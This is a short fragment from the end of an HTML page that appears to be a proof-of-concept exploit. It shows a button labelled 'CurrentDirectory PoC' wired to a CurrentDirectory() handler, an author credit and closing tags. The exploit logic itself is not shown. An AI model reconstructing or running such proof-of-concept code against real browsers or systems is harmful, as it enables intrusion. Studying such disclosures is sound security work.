VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br> Brought to You by Bl@ckbe@rD<br> Peace xD </BODY> </HTML>